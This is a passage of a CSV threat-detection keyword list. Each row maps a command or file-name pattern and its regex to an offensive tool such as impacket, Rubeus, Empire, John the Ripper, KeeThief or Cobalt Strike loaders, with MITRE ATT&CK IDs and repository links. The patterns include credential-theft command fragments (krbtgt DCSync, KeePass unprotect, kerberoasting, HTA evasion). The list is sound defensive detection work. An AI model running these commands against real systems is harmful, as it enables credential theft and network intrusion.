Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-inject.nse*",".{0,1000}\sjdwp\-inject\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-version.nse*",".{0,1000}\sjdwp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -JMXConsole -AppName *",".{0,1000}\s\-JMXConsole\s\-AppName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* john_done*",".{0,1000}\sjohn_done.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_fork*",".{0,1000}\sjohn_fork.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_load*",".{0,1000}\sjohn_load.{0,1000}","offensive_tool_keyword","john","John the 
Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_load_conf*",".{0,1000}\sjohn_load_conf.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_load_conf_db*",".{0,1000}\sjohn_load_conf_db.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_log_format*",".{0,1000}\sjohn_log_format.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_log_format2*",".{0,1000}\sjohn_log_format2.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_mpi_wait*",".{0,1000}\sjohn_mpi_wait.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_omp_fallback*",".{0,1000}\sjohn_omp_fallback.{0,1000}","offensive_tool_keyword","john","John 
the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_omp_init*",".{0,1000}\sjohn_omp_init.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_omp_maybe_adjust_or_fallback*",".{0,1000}\sjohn_omp_maybe_adjust_or_fallback.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_omp_show_info*",".{0,1000}\sjohn_omp_show_info.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_register_all*",".{0,1000}\sjohn_register_all.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_register_one*",".{0,1000}\sjohn_register_one.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* 
john_run*",".{0,1000}\sjohn_run.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_set_mpi*",".{0,1000}\sjohn_set_mpi.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_set_tristates*",".{0,1000}\sjohn_set_tristates.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* john_the_ripper_cracker.py*",".{0,1000}\sjohn_the_ripper_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* john_wait*",".{0,1000}\sjohn_wait.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* JohnTheRipper/*",".{0,1000}\sJohnTheRipper\/.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* 
JspShell ua*",".{0,1000}\sJspShell\sua.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* JuicyPotatoNG*",".{0,1000}\sJuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "* JumpSession.x64.o*",".{0,1000}\sJumpSession\.x64\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - 
TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "* JumpSession.x86.o*",".{0,1000}\sJumpSession\.x86\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","9","1","77","12","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z" "* -just-dc-ntlm *",".{0,1000}\s\-just\-dc\-ntlm\s\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -just-dc-ntlm -just-dc-user krbtgt *",".{0,1000}\s\-just\-dc\-ntlm\s\-just\-dc\-user\skrbtgt\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "* -just-dc-user *",".{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -just-dc-user 'krbtgt' -dc-ip * -k -no-pass @*",".{0,1000}\s\-just\-dc\-user\s\'krbtgt\'\s\-dc\-ip\s\s.{0,1000}\s\-k\s\-no\-pass\s\@.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -k * -c *.exe* -p Outlook.Application -o *.hta*",".{0,1000}\s\-k\s.{0,1000}\s\-c\s.{0,1000}\.exe.{0,1000}\s\-p\sOutlook\.Application\s\-o\s.{0,1000}\.hta.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*",".{0,1000}\s\-k\s.{0,1000}\s\-c\s.{0,1000}cmd\.exe\s\/c\s.{0,1000}\s\-o\s.{0,1000}\.hta\s\-p\sShellBrowserWindow.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* -k --kerberoast*",".{0,1000}\s\-k\s\-\-kerberoast.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "* -k -request-user * -dc-ip*",".{0,1000}\s\-k\s\-request\-user\s.{0,1000}\s\-dc\-ip.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* k8gege520 *",".{0,1000}\sk8gege520\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* 
kali-install.sh*",".{0,1000}\skali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "* kalilinux/kali-rolling*",".{0,1000}\skalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* KaynInject.h*",".{0,1000}\sKaynInject\.h.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "* 
KaynStrike.cna*",".{0,1000}\sKaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "* kdbof.cpp*",".{0,1000}\skdbof\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "* keepass /unprotect*",".{0,1000}\skeepass\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* keepass backdoor persistence*",".{0,1000}\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "* Keepass persistence backdoor *",".{0,1000}\sKeepass\spersistence\sbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "* KeePwn.py*",".{0,1000}\sKeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "* KeeTheft.exe*",".{0,1000}\sKeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" "* kekeo/modules/kull_m_memory.c*",".{0,1000}\skekeo\/modules\/kull_m_memory\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "* kerberoast 
*",".{0,1000}\skerberoast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* kerberoast /spn:*",".{0,1000}\skerberoast\s\/spn\:.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "* Kerberoastable -action list*",".{0,1000}\sKerberoastable\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - 
TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "* Kerberoastable -action write -target *",".{0,1000}\sKerberoastable\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "* Kerberoastables.txt*",".{0,1000}\sKerberoastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --kerberoasting *",".{0,1000}\s\-\-kerberoasting\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* --kerberoasting*",".{0,1000}\s\-\-kerberoasting.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* kerberos asreproast 
